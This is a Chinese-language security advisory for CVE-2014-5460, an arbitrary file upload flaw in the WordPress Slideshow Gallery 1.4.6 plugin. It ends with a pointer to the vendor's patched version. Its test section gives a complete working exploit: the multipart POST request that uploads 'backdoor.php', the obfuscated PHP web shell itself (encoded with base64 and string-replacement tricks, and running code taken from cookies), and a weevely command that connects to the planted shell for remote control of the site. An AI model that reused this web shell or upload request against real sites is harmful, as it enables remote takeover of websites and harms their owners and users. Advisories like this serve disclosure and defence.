WordPress Slideshow Gallery插件'admin.php'任意文件上传漏洞
WordPress Slideshow Gallery插件'admin.php'任意文件上传漏洞
发布日期:2014-08-30
更新日期:2014-09-03
受影响系统:
WordPress Slideshow Gallery 1.4.6
不受影响系统:
WordPress Slideshow Gallery 1.4.7
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69485
CVE(CAN) ID: CVE-2014-5460
WordPress Slideshow Gallery插件可在WordPress网站上展示幻灯片库。
Slideshow Gallery 1.4.6及其他版本允许任何注册的用户将PHP shell上传到主机系统,攻击者可利用此漏洞上传任意文件到受影响计算机,导致在受影响应用上下文中执行任意代码。
<*来源:JesÃos RamÃ-rez Pichardo
链接:http://www.securityfocus.com/archive/1/533280
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1.An attacker uploads a PHP shell file (i.e. backdoor.php):
POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides
&method=save HTTP/1.1
Content-Type: multipart/form-data
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce");
$dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNv
ZGUz";
$asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhN
obyAnPC8nLzhiRrLic+Jzt9";
$gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhL
ycpLCBhcnJheSzh";
$fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJ
GMzhoJGEpPjMpezhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
2.The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.ph
p
3.The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.ph
p whitexploit
4.Now the attacker has a ?telnet-like console?. Finally, the attacker has the remote control of the vulnerable website.
建议:
--------------------------------------------------------------------------------
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://wordpress.org/plugins/slideshow-gallery/changelog
本文永久更新链接地址:
评论暂时关闭